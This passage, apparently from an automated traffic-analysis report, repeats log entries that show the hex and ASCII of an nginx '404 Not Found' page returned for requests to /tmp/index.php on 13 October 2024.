20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 